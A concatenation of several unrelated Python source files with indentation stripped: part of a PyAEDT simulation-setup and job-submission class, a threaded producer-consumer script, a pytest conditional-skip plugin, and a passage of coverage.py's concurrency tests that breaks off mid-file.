"""Nominal with values in a dictionary.
References
----------
>>> oDesign.GetChildObject('Variables').GetChildNames
>>> oDesign.GetVariables
>>> oDesign.GetVariableValue
>>> oDesign.GetNominalVariation"""
families = {}
if self._app.design_type == "HFSS 3D Layout Design":
if self._app._is_object_oriented_enabled():
listvar = list(self._app._odesign.GetChildObject("Variables").GetChildNames())
else:
listvar = list(self._app._odesign.GetVariables())
for el in listvar:
families[el] = self._app._odesign.GetVariableValue(el)
else:
variation = self._app._odesign.GetNominalVariation()
for el in self.variables:
families[el] = self._app._odesign.GetVariationVariableValue(variation, el)
return families
@property
def all(self):
"""All."""
families = []
for el in self.variables:
families.append(el + ":=")
families.append(["All"])
return families
class AxisDir(object):
"""Contains constants for the axis directions."""
(XNeg, YNeg, ZNeg, XPos, YPos, ZPos) = range(0, 6)
@aedt_exception_handler
def get_setups(self):
"""Retrieve setups.
Returns
-------
list of str
List of names of all setups.
References
----------
>>> oModule.GetSetups
"""
setups = self.oanalysis.GetSetups()
return list(setups)
@aedt_exception_handler
def get_nominal_variation(self):
"""Retrieve the nominal variation.
Returns
-------
list of str
List of nominal variations.
"""
return self.available_variations.nominal
@aedt_exception_handler
def get_sweeps(self, name):
"""Retrieve all sweep for a setup.
Parameters
----------
name : str
Name of the setup.
Returns
-------
list of str
List of names of all sweeps for the setup.
References
----------
>>> oModule.GetSweeps
"""
sweeps = self.oanalysis.GetSweeps(name)
return list(sweeps)
@aedt_exception_handler
def export_parametric_results(self, sweepname, filename, exportunits=True):
"""Export a list of all parametric variations solved for a sweep to a CSV file.
Parameters
----------
sweepname : str
Name of the optimetrics sweep.
filename : str
Full path and name for the CSV file.
exportunits : bool, optional
Whether to export units with the value. The default is ``True``. When ``False``,
only the value is exported.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oModule.ExportParametricResults
"""
self.ooptimetrics.ExportParametricResults(sweepname, filename, exportunits)
return True
@aedt_exception_handler
def analyze_from_initial_mesh(self):
"""Revert the solution to the initial mesh and re-run the solve.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oModule.RevertSetupToInitial
>>> oDesign.Analyze
"""
self.oanalysis.RevertSetupToInitial(self._setup)
self.analyze_nominal()
return True
@aedt_exception_handler
def analyse_nominal(self):
"""Solve the nominal design.
.. deprecated:: 0.4.0
Use :func:`Analysis.analyze_nominal` instead.
"""
warnings.warn("`analyse_nominal` is deprecated. Use `analyze_nominal` instead.", DeprecationWarning)
self.analyze_nominal()
@aedt_exception_handler
def analyze_nominal(self, num_cores=None, num_tasks=None, num_gpu=None, acf_file=None):
"""Solve the nominal design.
Parameters
----------
num_cores : int, optional
Number of Simulation cores.
num_tasks : int, optional
Number of Simulation tasks.
num_gpu : int, optional
Number of Simulation Gpu to use.
acf_file : str, optional
Full path to custom acf_file.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oDesign.Analyze
"""
return self.analyze_setup(self.analysis_setup, num_cores, num_tasks, num_gpu, acf_file)
@aedt_exception_handler
def generate_unique_setup_name(self, setup_name=None):
"""Generate a new setup with an unique name.
Parameters
----------
setup_name : str, optional
Name of the setup. The default is ``None``.
Returns
-------
str
Name of the setup.
"""
if not setup_name:
setup_name = "Setup"
index = 2
while setup_name in self.existing_analysis_setups:
setup_name = setup_name + "_{}".format(index)
index += 1
return setup_name
@aedt_exception_handler
def create_setup(self, setupname="MySetupAuto", setuptype=None, props={}):
"""Create a setup.
Parameters
----------
setupname : str, optional
Name of the setup. The default is ``"MySetupAuto"``.
setuptype : optional
Type of the setup. The default is ``None``, in which case
the default type is applied.
props : dict, optional
Dictionary of analysis properties appropriate for the design and analysis.
If no values are passed, default values will be used.
Returns
-------
:class:`pyaedt.modules.SolveSetup.Setup`
References
----------
>>> oModule.InsertSetup
Examples
--------
Create a setup for SBR+ setup using advanced Doppler
processing for automotive radar.
>>> import pyaedt
>>> hfss = pyaedt.Hfss(solution_type='SBR+')
>>> setup1 = hfss.create_setup(setupname='Setup1')
>>> setup1.props["IsSbrRangeDoppler"] = True
>>> setup1.props["SbrRangeDopplerTimeVariable"] = "time_var"
>>> setup1.props["SbrRangeDopplerCenterFreq"] = "76.5GHz"
>>> setup1.props["SbrRangeDopplerRangeResolution"] = "0.15meter"
>>> setup1.props["SbrRangeDopplerRangePeriod"] = "100meter"
>>> setup1.props["SbrRangeDopplerVelocityResolution"] = "0.2m_per_sec"
>>> setup1.props["SbrRangeDopplerVelocityMin"] = "-30m_per_sec"
>>> setup1.props["SbrRangeDopplerVelocityMax"] = "30m_per_sec"
>>> setup1.props["DopplerRayDensityPerWavelength"] = "0.2"
>>> setup1.props["MaxNumberOfBounces"] = "3"
>>> setup1.update()
...
pyaedt info: Sweep was created correctly.
"""
if setuptype is None:
setuptype = self.design_solutions.default_setup
name = self.generate_unique_setup_name(setupname)
setup = Setup(self, setuptype, name)
if self.design_type == "HFSS" and not self.get_excitations_name() and "MaxDeltaS" in setup.props:
new_dict = OrderedDict()
for k, v in setup.props.items():
if k == "MaxDeltaS":
new_dict["MaxDeltaE"] = 0.01
else:
new_dict[k] = v
setup.props = new_dict
setup.create()
if props:
for el in props:
setup.props[el] = props[el]
setup.update()
self.analysis_setup = name
self.setups.append(setup)
return setup
@aedt_exception_handler
def delete_setup(self, setupname):
"""Delete a setup.
Parameters
----------
setupname : str
Name of the setup.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oModule.DeleteSetups
Examples
--------
Create a setup and then delete it.
>>> import pyaedt
>>> hfss = pyaedt.Hfss()
>>> setup1 = hfss.create_setup(setupname='Setup1')
>>> hfss.delete_setup(setupname='Setup1')
...
pyaedt info: Sweep was deleted correctly.
"""
if setupname in self.existing_analysis_setups:
self.oanalysis.DeleteSetups([setupname])
for s in self.setups:
if s.name == setupname:
self.setups.remove(s)
return True
return False
@aedt_exception_handler
def edit_setup(self, setupname, properties_dict):
"""Modify a setup.
Parameters
----------
setupname : str
Name of the setup.
properties_dict : dict
Dictionary containing the property to update with the value.
Returns
-------
:class:`pyaedt.modules.SolveSetup.Setup`
References
----------
>>> oModule.EditSetup
"""
setuptype = self.design_solutions.default_setup
setup = Setup(self, setuptype, setupname, isnewsetup=False)
setup.update(properties_dict)
self.analysis_setup = setupname
return setup
@aedt_exception_handler
def get_setup(self, setupname):
"""Get the setup from the current design.
Parameters
----------
setupname : str
Name of the setup.
Returns
-------
:class:`pyaedt.modules.SolveSetup.Setup`
"""
setuptype = self.design_solutions.default_setup
setup = Setup(self, setuptype, setupname, isnewsetup=False)
if setup.props:
self.analysis_setup = setupname
return setup
@aedt_exception_handler
def create_output_variable(self, variable, expression):
"""Create or modify an output variable.
Parameters
----------
variable : str
Name of the variable.
expression :
Value for the variable.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oModule.CreateOutputVariable
"""
oModule = self.ooutput_variable
if variable in self.output_variables:
oModule.EditOutputVariable(
variable, expression, variable, self.existing_analysis_sweeps[0], self.solution_type, []
)
else:
oModule.CreateOutputVariable(variable, expression, self.existing_analysis_sweeps[0], self.solution_type, [])
return True
@aedt_exception_handler
def get_output_variable(self, variable):
"""Retrieve the value of the output variable.
Parameters
----------
variable : str
Name of the variable.
Returns
-------
type
Value of the output variable.
References
----------
>>> oDesign.GetNominalVariation
>>> oModule.GetOutputVariableValue
"""
assert variable in self.output_variables, "Output variable {} does not exist.".format(variable)
nominal_variation = self.odesign.GetNominalVariation()
sol_type = self.solution_type
value = self.ooutput_variable.GetOutputVariableValue(
variable, nominal_variation, self.existing_analysis_sweeps[0], self.solution_type, []
)
return value
@aedt_exception_handler
def get_object_material_properties(self, object_list=None, prop_names=None):
"""Retrieve the material properties for a list of given objects and return them in a dictionary.
This high-level function ignores objects with no defined material properties.
Parameters
----------
object_list : list, optional
List of objects for which to get material_properties. The default is ``None``,
in which case all objects are considered.
prop_names : str or list
The property or list of properties to export. The default is ``None``, in
which case all properties are exported.
Returns
-------
dict
Dictionary of objects with material properties.
"""
if object_list:
if not isinstance(object_list, list):
object_list = [object_list]
else:
object_list = self.modeler.primitives.object_names
if prop_names:
if not isinstance(prop_names, list):
prop_names = [prop_names]
dict = {}
for entry in object_list:
mat_name = self.modeler.primitives[entry].material_name
mat_props = self._materials[mat_name]
if prop_names is None:
dict[entry] = mat_props._props
else:
dict[entry] = {}
for prop_name in prop_names:
dict[entry][prop_name] = mat_props._props[prop_name]
return dict
@aedt_exception_handler
def analyze_setup(self, name, num_cores=None, num_tasks=None, num_gpu=None, acf_file=None):
"""Analyze a specific design setup.
Parameters
----------
name : str
Name of the setup, which can be an optimetric setup or a simple setup.
num_cores : int, optional
Number of Simulation cores.
num_tasks : int, optional
Number of Simulation tasks.
num_gpu : int, optional
Number of Simulation Gpu to use.
acf_file : str, optional
Full path to custom acf_file.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oDesign.Analyze
"""
set_custom_dso = False
active_config = self._desktop.GetRegistryString(r"Desktop/ActiveDSOConfigurations/" + self.design_type)
if acf_file:
self._desktop.SetRegistryFromFile(acf_file)
name = ""
with open(acf_file, "r") as f:
lines = f.readlines()
for line in lines:
if "ConfigName" in line:
name = line.strip().split("=")[1]
break
if name:
try:
self.set_registry_key(r"Desktop/ActiveDSOConfigurations/" + self.design_type, name)
set_custom_dso = True
except:
pass
elif num_gpu or num_tasks or num_cores:
config_name = "pyaedt_config"
source_name = os.path.join(self.pyaedt_dir, "misc", "pyaedt_local_config.acf")
target_name = os.path.join(self.working_directory, config_name + ".acf")
shutil.copy2(source_name, target_name)
if num_cores:
update_hpc_option(target_name, "NumCores", num_cores, False)
if num_gpu:
update_hpc_option(target_name, "NumGPUs", num_gpu, False)
if num_tasks:
update_hpc_option(target_name, "NumEngines", num_tasks, False)
update_hpc_option(target_name, "ConfigName", config_name, True)
update_hpc_option(target_name, "DesignType", self.design_type, True)
if self.design_type == "Icepak":
update_hpc_option(target_name, "UseAutoSettings", self.design_type, False)
try:
self._desktop.SetRegistryFromFile(target_name)
self.set_registry_key(r"Desktop/ActiveDSOConfigurations/" + self.design_type, config_name)
set_custom_dso = True
except:
pass
if name in self.existing_analysis_setups:
try:
self.logger.info("Solving design setup %s", name)
self.odesign.Analyze(name)
except:
if set_custom_dso:
self.set_registry_key(r"Desktop/ActiveDSOConfigurations/" + self.design_type, active_config)
self.logger.error("Error in Solving Setup %s", name)
return False
else:
try:
self.logger.info("Solving Optimetrics")
self.ooptimetrics.SolveSetup(name)
except:
if set_custom_dso:
self.set_registry_key(r"Desktop/ActiveDSOConfigurations/" + self.design_type, active_config)
self.logger.error("Error in Solving or Missing Setup %s", name)
return False
if set_custom_dso:
self.set_registry_key(r"Desktop/ActiveDSOConfigurations/" + self.design_type, active_config)
self.logger.info("Design setup %s solved correctly", name)
return True
@aedt_exception_handler
def solve_in_batch(self, filename=None, machine="local", run_in_thread=False):
"""Analyze a design setup in batch mode.
.. note::
To use this function, the AEDT project must be closed.
Parameters
----------
filename : str, optional
Name of the setup. The default is ``None``, which means that the active project
is to be solved.
machine : str, optional
Name of the machine if remote. The default is ``"local"``.
run_in_thread : bool, optional
Whether the batch command is to be submitted as a thread. The default is
``False``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
if not filename:
filename = self.project_file
self.close_project()
if machine == "local":
# -Monitor option used as workaround for R2 BatchSolve not exiting properly at the end of the Batch job
options = " -ng -BatchSolve -Monitor "
else:
options = " -ng -distribute -machinelist list=" + machine + " -Batchsolve "
self.logger.info("Batch Solve Options: " + options)
if os.name == "posix":
batch_run = os.path.join(
self.desktop_install_dir + "/ansysedt" + chr(34) + options + chr(34) + filename + chr(34)
)
else:
batch_run = (
chr(34) + self.desktop_install_dir + "/ansysedt.exe" + chr(34) + options + chr(34) + filename + chr(34)
)
"""
check for existing solution directory and delete if present so we
dont have old .asol files etc
"""
self.logger.info("Solving model in batch mode on " + machine)
self.logger.info("Batch Job command:" + batch_run)
if run_in_thread:
def thread_run():
""" """
os.system(batch_run)
x = threading.Thread(target=thread_run)
x.start()
else:
os.system(batch_run)
self.logger.info("Batch job finished.")
return True
@aedt_exception_handler
def submit_job(
self, clustername, aedt_full_exe_path=None, numnodes=1, numcores=32, wait_for_license=True, setting_file=None
):
"""Submit a job to be solved on a cluster.
Parameters
----------
clustername : str
Name of the cluster to submit the job to.
aedt_full_exe_path : str, optional
Full path to the AEDT executable file. The default is ``None``, in which
case ``"/clustername/AnsysEM/AnsysEM2x.x/Win64/ansysedt.exe"`` is used.
numnodes : int, optional
Number of nodes. The default is ``1``.
numcores : int, optional
Number of cores. The default is ``32``.
wait_for_license : bool, optional
Whether to wait for the license to be validated. The default is ``True``.
setting_file : str, optional
Name of the file to use as a template. The default value is ``None``.
Returns
-------
type
ID of the job.
References
----------
>>> oDesktop.SubmitJob
"""
project_file = self.project_file
project_path = self.project_path
if not aedt_full_exe_path:
version = self.odesktop.GetVersion()[2:6]
if os.path.exists(r"\\" + clustername + r"\AnsysEM\AnsysEM{}\Win64\ansysedt.exe".format(version)):
aedt_full_exe_path = (
r"\\\\\\\\" + clustername + r"\\\\AnsysEM\\\\AnsysEM{}\\\\Win64\\\\ansysedt.exe".format(version)
)
elif os.path.exists(r"\\" + clustername + r"\AnsysEM\AnsysEM{}\Linux64\ansysedt".format(version)):
aedt_full_exe_path = (
r"\\\\\\\\" + clustername + r"\\\\AnsysEM\\\\AnsysEM{}\\\\Linux64\\\\ansysedt".format(version)
)
else:
self.logger.error("AEDT path does not exist. Please provide a full path.")
return False
else:
if not os.path.exists(aedt_full_exe_path):
self.logger.error("Aedt Path doesn't exists. Please provide a full path")
return False
aedt_full_exe_path.replace("\\", "\\\\")
self.close_project()
path_file = os.path.dirname(__file__)
destination_reg = os.path.join(project_path, "Job_settings.areg")
if not setting_file:
setting_file = os.path.join(path_file, "..", "misc", "Job_Settings.areg")
shutil.copy(setting_file, destination_reg)
f1 = open(destination_reg, "w")
with open(setting_file) as f:
lines = f.readlines()
for line in lines:
if "\\ $begin" == line[:8]:
lin = "\\ $begin \\'{}\\'\\\n".format(clustername)
f1.write(lin)
elif "\\ $end" == line[:6]:
lin = "\\ $end \\'{}\\'\\\n".format(clustername)
f1.write(lin)
elif "NumCores" in line:
lin = "\\ \\ \\ \\ NumCores={}\\\n".format(numcores)
f1.write(lin)
elif "NumNodes=1" in line:
lin = "\\ \\ \\ \\ NumNodes={}\\\n".format(numnodes)
f1.write(lin)
elif "ProductPath" in line:
lin = "\\ \\ ProductPath =\\'{}\\'\\\n".format(aedt_full_exe_path)
f1.write(lin)
elif "WaitForLicense" in line:
lin = "\\ \\ WaitForLicense={}\\\n".format(str(wait_for_license).lower())
f1.write(lin)
else:
f1.write(line)
f1.close()
return self.odesktop.SubmitJob(os.path.join(project_path, "Job_settings.areg"), project_file)
|
Main.py
|
import queue
import time
from queue import Queue
from Consumer import Consumer
from Producer import Producer
from threading import Thread
if __name__ == '__main__':
workQueue = Queue()
finishQueue = Queue()
array1 = [1, 2, 3, 4]
array2 = [5, 6, 7, 8]
producerObj = Producer(array1, array2)
consumerObj = Consumer(len(array1))
producer = Thread(target = producerObj.run, args = [workQueue, finishQueue], daemon = True)
consumer = Thread(target = consumerObj.run, args = [workQueue, finishQueue], daemon = True)
producer.start()
consumer.start()
producer.join()
print('Producer finished !')
consumer.join()
print('Consumer finished !')
print('Main thread has finished !')
|
CustomSkipIf.py
|
import multiprocessing
import yaml
import pytest
import logging
import os
import sys
from abc import ABCMeta, abstractmethod
logger = logging.getLogger()
CUSTOM_SKIP_IF_DICT = 'custom_skip_if_dict'
CUSTOM_TEST_SKIP_PLATFORM_TYPE = 'dynamic_tests_skip_platform_type'
PLATFORM = 'Platform'
def pytest_collection(session):
initialize_cached_variables(session)
def initialize_cached_variables(session):
session.config.cache.set(CUSTOM_SKIP_IF_DICT, None)
session.config.cache.set(CUSTOM_TEST_SKIP_PLATFORM_TYPE, None)
def pytest_runtest_setup(item):
"""
Skip tests conditionally based on the user_tests_to_be_skipped list
"""
skip_tests_file_path = get_tests_to_be_skipped_path()
if os.path.exists(skip_tests_file_path):
skip_tests_dict = read_skip_file(item, skip_tests_file_path)
update_syspath_for_dynamic_import()
for test_prefix, skip_list_of_dicts in skip_tests_dict.items():
if test_in_skip_list(item, test_prefix):
logger.debug('Found custom skip condition: {}'.format(test_prefix))
make_skip_decision(skip_list_of_dicts, item)
def get_tests_to_be_skipped_path(skip_tests_file='tests_to_be_skipped_conditionally.yaml'):
"""
Get path to file with dynamic skip information
:param skip_tests_file: skip test file name
:return: full path to skip test file name
"""
custom_skip_folder_path = os.path.dirname(__file__)
custom_skip_tests_file_path = os.path.join(custom_skip_folder_path, skip_tests_file)
return custom_skip_tests_file_path
def read_skip_file(item, skip_tests_file_path):
"""
Read yaml file with list of test cases which should be skipped
:param item: pytest test item
:param skip_tests_file_path: path to file where stored list of test cases which should be skipped
:return: yaml loaded dictionary
"""
skip_dictionary = item.session.config.cache.get(CUSTOM_SKIP_IF_DICT, None)
if not skip_dictionary:
with open(skip_tests_file_path) as skip_data:
logger.debug('Reading dynamic skip file: {}'.format(skip_tests_file_path))
skip_dictionary = yaml.load(skip_data, Loader=yaml.FullLoader)
item.session.config.cache.set(CUSTOM_SKIP_IF_DICT, skip_dictionary)
return skip_dictionary
def update_syspath_for_dynamic_import():
"""
Update sys.path by current folder to have possibility to load python modules dynamically
"""
if os.path.dirname(__file__) not in sys.path:
sys.path.append(os.path.dirname(__file__))
def test_in_skip_list(item, test_prefix):
"""
Check if current test in skip list
:param item: pytest test item
:param test_prefix: test prefix from ignore yaml file
:return: True/False
"""
return str(item.nodeid).startswith(test_prefix)
def make_skip_decision(skip_list_of_dicts, item):
"""
Make a final decision about whether to skip the test by combining the results of all the skip statements.
:param skip_list_of_dicts: list with data which we read from ignore yaml file
:param item: pytest test item
:return: None or pytest.skip in case when we need to skip test
"""
skip_result_list = []
skip_reason_str = ''
for skip_dict_entry in skip_list_of_dicts:
if is_nested_dict(skip_dict_entry):
skip_reason_str = update_skip_results(skip_dict_entry, item, 'and', skip_result_list, skip_reason_str)
else:
skip_reason_str = update_skip_results(skip_dict_entry, item, 'or', skip_result_list, skip_reason_str)
# Make final decision
if any(skip_result_list):
pytest.skip(skip_reason_str)
def is_nested_dict(dict_obj):
nested_dict_min_len = 2
return len(dict_obj) >= nested_dict_min_len
def update_skip_results(skip_dict, item, operand, skip_result_list, skip_reason_str):
"""
Get results from skip checkers and update skip_result_list and skip_reason_str
:param skip_dict: dictionary with data which we read from ignore yaml file
:param item: pytest test item
:param operand: operand which will be used between skip by items, can be "or", "and"
:param skip_result_list: list which we update according to checkers results
:param skip_reason_str: skip reason string which we update according to checkers results
:return: skip_reason_str - string which contains skip reason
"""
skip_required, skip_reason = get_checkers_result(skip_dict, item, operand)
skip_result_list.append(skip_required)
skip_reason_str += skip_reason
return skip_reason_str
def get_checkers_result(skip_dict, item, operand='or'):
"""
Get results about whether to skip the test by combining the results of all the skip statements.
:param skip_dict: dictionary with skip test case skip conditions
:param item: pytest build-in
:param operand: operand which will be used to make decision about skip
:return: True/False and string with skip reason
"""
skip_reason = ''
checkers_result = []
skip_checkers_list = prepare_checkers(skip_dict, item)
skip_dict_result = run_checkers_in_parallel(skip_checkers_list)
for checker, checker_result in skip_dict_result.items():
if checker_result:
skip_reason += '\nTest skipped due to {}: {}'.format(checker, checker_result)
checkers_result.append(True)
else:
checkers_result.append(False)
if operand == 'or':
skip_required = any(checkers_result)
else:
skip_required = all(checkers_result)
if not skip_required:
skip_reason = ''
return skip_required, skip_reason
def prepare_checkers(skip_dict, pytest_item_obj):
"""
Import dynamically checker modules and initialize them
:param skip_dict: dictionary with skip test case skip conditions
:param pytest_item_obj: pytest build in
:return: list with checkers objects
"""
skip_checkers_list = []
for skip_by in skip_dict:
logger.debug('Importing dynamic skip module: {}'.format(skip_by))
try:
skip_module_obj = __import__(skip_by).SkipIf(skip_dict[skip_by], pytest_item_obj)
skip_checkers_list.append(skip_module_obj)
except Exception as err:
logger.error('Unable to load dynamically skip object: {}'.format(err))
return skip_checkers_list
def run_checkers_in_parallel(skip_checkers_list):
"""
Run checkers in parallel and return results
:param skip_checkers_list: list with checkers objects
:return: dictionary with checkers result
"""
manager = multiprocessing.Manager()
skip_dict_result = manager.dict()
proc_list = list()
for skip_check in skip_checkers_list:
skip_dict_result[skip_check.name] = None
proc_list.append(multiprocessing.Process(target=skip_check.is_skip_required, args=(skip_dict_result,)))
for proc in proc_list:
proc.start()
for proc in proc_list:
proc.join(timeout=60)
return skip_dict_result
class CustomSkipIf:
__metaclass__ = ABCMeta
def __init__(self, ignore_list, pytest_item_obj):
# self.name = 'CustomSkipIf' # Example: Platform, Jira, Redmine - should be defined in each child class
self.ignore_list = ignore_list
self.pytest_item_obj = pytest_item_obj
@abstractmethod
def is_skip_required(self, skip_dict_result):
"""
Decide whether or not to skip a test
:param skip_dict_result: shared dictionary with data about skip test
:return: updated skip_dict
"""
return skip_dict_result
|
test_concurrency.py
|
# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://github.com/nedbat/coveragepy/blob/master/NOTICE.txt
"""Tests for concurrency libraries."""
import glob
import os
import random
import re
import sys
import threading
import time
from flaky import flaky
import pytest
import coverage
from coverage import env
from coverage.data import line_counts
from coverage.exceptions import ConfigError
from coverage.files import abs_file
from coverage.misc import import_local_file
from tests.coveragetest import CoverageTest
# These libraries aren't always available, we'll skip tests if they aren't.
try:
import multiprocessing
except ImportError: # pragma: only jython
multiprocessing = None
try:
import eventlet
except ImportError:
eventlet = None
try:
import gevent
except ImportError:
gevent = None
try:
import greenlet
except ImportError: # pragma: only jython
greenlet = None
def measurable_line(l):
"""Is this a line of code coverage will measure?
Not blank, not a comment, and not "else"
"""
l = l.strip()
if not l:
return False
if l.startswith('#'):
return False
if l.startswith('else:'):
return False
if env.JYTHON and l.startswith(('try:', 'except:', 'except ', 'break', 'with ')):
# Jython doesn't measure these statements.
return False # pragma: only jython
return True
def line_count(s):
"""How many measurable lines are in `s`?"""
return len(list(filter(measurable_line, s.splitlines())))
def print_simple_annotation(code, linenos):
"""Print the lines in `code` with X for each line number in `linenos`."""
for lineno, line in enumerate(code.splitlines(), start=1):
print(" {} {}".format("X" if lineno in linenos else " ", line))
class LineCountTest(CoverageTest):
"""Test the helpers here."""
run_in_temp_dir = False
def test_line_count(self):
CODE = """
# Hey there!
x = 1
if x:
print("hello")
else:
print("bye")
print("done")
"""
assert line_count(CODE) == 5
# The code common to all the concurrency models.
SUM_RANGE_Q = """
# Above this will be imports defining queue and threading.
class Producer(threading.Thread):
def __init__(self, limit, q):
threading.Thread.__init__(self)
self.limit = limit
self.q = q
def run(self):
for i in range(self.limit):
self.q.put(i)
self.q.put(None)
class Consumer(threading.Thread):
def __init__(self, q, qresult):
threading.Thread.__init__(self)
self.q = q
self.qresult = qresult
def run(self):
sum = 0
while "no peephole".upper():
i = self.q.get()
if i is None:
break
sum += i
self.qresult.put(sum)
def sum_range(limit):
q = queue.Queue()
qresult = queue.Queue()
c = Consumer(q, qresult)
p = Producer(limit, q)
c.start()
p.start()
p.join()
c.join()
return qresult.get()
# Below this will be something using sum_range.
"""
PRINT_SUM_RANGE = """
print(sum_range({QLIMIT}))
"""
# Import the things to use threads.
THREAD = """
import threading
import queue
"""
# Import the things to use eventlet.
EVENTLET = """
import eventlet.green.threading as threading
import eventlet.queue as queue
"""
# Import the things to use gevent.
GEVENT = """
from gevent import monkey
monkey.patch_thread()
import threading
import gevent.queue as queue
"""
# Uncomplicated code that doesn't use any of the concurrency stuff, to test
# the simple case under each of the regimes.
SIMPLE = """
total = 0
for i in range({QLIMIT}):
total += i
print(total)
"""
def cant_trace_msg(concurrency, the_module):
"""What might coverage.py say about a concurrency setting and imported module?"""
# In the concurrency choices, "multiprocessing" doesn't count, so remove it.
if "multiprocessing" in concurrency:
parts = concurrency.split(",")
parts.remove("multiprocessing")
concurrency = ",".join(parts)
if the_module is None:
# We don't even have the underlying module installed, we expect
# coverage to alert us to this fact.
expected_out = (
f"Couldn't trace with concurrency={concurrency}, the module isn't installed.\n"
)
elif env.C_TRACER or concurrency == "thread" or concurrency == "":
expected_out = None
else:
expected_out = (
f"Can't support concurrency={concurrency} with PyTracer, only threads are supported.\n"
)
return expected_out
class ConcurrencyTest(CoverageTest):
"""Tests of the concurrency support in coverage.py."""
QLIMIT = 1000
def try_some_code(self, code, concurrency, the_module, expected_out=None):
"""Run some concurrency testing code and see that it was all covered.
`code` is the Python code to execute. `concurrency` is the name of
the concurrency regime to test it under. `the_module` is the imported
module that must be available for this to work at all. `expected_out`
is the text we expect the code to produce.
"""
self.make_file("try_it.py", code)
cmd = f"coverage run --concurrency={concurrency} try_it.py"
out = self.run_command(cmd)
expected_cant_trace = cant_trace_msg(concurrency, the_module)
if expected_cant_trace is not None:
assert out == expected_cant_trace
pytest.skip(f"Can't test: {expected_cant_trace}")
else:
# We can fully measure the code if we are using the C tracer, which
# can support all the concurrency, or if we are using threads.
if expected_out is None:
expected_out = "%d\n" % (sum(range(self.QLIMIT)))
print(code)
assert out == expected_out
# Read the coverage file and see that try_it.py has all its lines
# executed.
data = coverage.CoverageData(".coverage")
data.read()
# If the test fails, it's helpful to see this info:
fname = abs_file("try_it.py")
linenos = data.lines(fname)
print(f"{len(linenos)}: {linenos}")
print_simple_annotation(code, linenos)
lines = line_count(code)
assert line_counts(data)['try_it.py'] == lines
def test_threads(self):
code = (THREAD + SUM_RANGE_Q + PRINT_SUM_RANGE).format(QLIMIT=self.QLIMIT)
self.try_some_code(code, "thread", threading)
def test_threads_simple_code(self):
code = SIMPLE.format(QLIMIT=self.QLIMIT)
self.try_some_code(code, "thread", threading)
def test_eventlet(self):
code = (EVENTLET + SUM_RANGE_Q + PRINT_SUM_RANGE).format(QLIMIT=self.QLIMIT)
self.try_some_code(code, "eventlet", eventlet)
def test_eventlet_simple_code(self):
code = SIMPLE.format(QLIMIT=self.QLIMIT)
self.try_some_code(code, "eventlet", eventlet)
# https://github.com/nedbat/coveragepy/issues/663
@pytest.mark.skipif(env.WINDOWS, reason="gevent has problems on Windows: #663")
def test_gevent(self):
code = (GEVENT + SUM_RANGE_Q + PRINT_SUM_RANGE).format(QLIMIT=self.QLIMIT)
self.try_some_code(code, "gevent", gevent)
def test_gevent_simple_code(self):
code = SIMPLE.format(QLIMIT=self.QLIMIT)
self.try_some_code(code, "gevent", gevent)
def test_greenlet(self):
GREENLET = """\
from greenlet import greenlet
def test1(x, y):
z = gr2.switch(x+y)
print(z)
def test2(u):
print(u)
gr1.switch(42)
gr1 = greenlet(test1)
gr2 = greenlet(test2)
gr1.switch("hello", " world")
"""
self.try_some_code(GREENLET, "greenlet", greenlet, "hello world\n42\n")
def test_greenlet_simple_code(self):
code = SIMPLE.format(QLIMIT=self.QLIMIT)
self.try_some_code(code, "greenlet", greenlet)
def test_bug_330(self):
BUG_330 = """\
from weakref import WeakKeyDictionary
import eventlet
def do():
eventlet.sleep(.01)
gts = WeakKeyDictionary()
for _ in range(100):
gts[eventlet.spawn(do)] = True
eventlet.sleep(.005)
eventlet.sleep(.1)
print(len(gts))
"""
self.try_some_code(BUG_330, "eventlet", eventlet, "0\n")
def test_threads_with_gevent(self):
self.make_file("both.py", """\
import queue
import threading
import gevent
def work1(q):
q.put(1)
def gwork(q):
gevent.spawn(work1, q).join()
q.put(None)
print("done")
q = queue.Queue()
t = threading.Thread(target=gwork, args=(q,))
t.start()
t.join()
answer = q.get()
assert answer == 1
""")
out = self.run_command("coverage run --concurrency=thread,gevent both.py")
if gevent is None:
assert out == (
"Couldn't trace with concurrency=gevent, the module isn't installed.\n"
)
pytest.skip("Can't run test without gevent installed.")
if not env.C_TRACER:
assert out == (
"Can't support concurrency=gevent with PyTracer, only threads are supported.\n"
)
pytest.skip("Can't run gevent with PyTracer")
assert out == "done\n"
out = self.run_command("coverage report -m")
last_line = self.squeezed_lines(out)[-1]
assert re.search(r"TOTAL \d+ 0 100%", last_line)
def test_bad_concurrency(self):
with pytest.raises(ConfigError, match="Unknown concurrency choices: nothing"):
self.command_line("run --concurrency=nothing prog.py")
def test_bad_concurrency_in_config(self):
self.make_file(".coveragerc", "[run]\nconcurrency = nothing\n")
with pytest.raises(ConfigError, match="Unknown concurrency choices: nothing"):
self.command_line("run prog.py")
def test_no_multiple_light_concurrency(self):
with pytest.raises(ConfigError, match="Conflicting concurrency settings: eventlet, gevent"):
self.command_line("run --concurrency=gevent,eventlet prog.py")
def test_no_multiple_light_concurrency_in_config(self):
self.make_file(".coveragerc", "[run]\nconcurrency = gevent, eventlet\n")
with pytest.raises(ConfigError, match="Conflicting concurrency settings: eventlet, gevent"):
self.command_line("run prog.py")
def test_multiprocessing_needs_config_file(self):
with pytest.raises(ConfigError, match="multiprocessing requires a configuration file"):
self.command_line("run --concurrency=multiprocessing prog.py")
class WithoutConcurrencyModuleTest(CoverageTest):
"""Tests of what happens if the requested concurrency isn't installed."""
@pytest.mark.parametrize("module", ["eventlet", "gevent", "greenlet"])
def test_missing_module(self, module):
self.make_file("prog.py", "a = 1")
sys.modules[module] = None
msg = f"Couldn't trace with concurrency={module}, the module isn't installed."
with pytest.raises(ConfigError, match=msg):
self.command_line(f"run --concurrency={module} prog.py")
SQUARE_OR_CUBE_WORK = """
def work(x):
# Use different lines in different subprocesses.
if x % 2:
y = x*x
else:
y = x*x*x
return y
"""
SUM_RANGE_WORK = """
def work(x):
return sum_range((x+1)*100)
"""
MULTI_CODE = """
# Above this will be a definition of work().
import multiprocessing
import os
import time
import sys
def process_worker_main(args):
# Need to pause, or the tasks go too quickly, and some processes
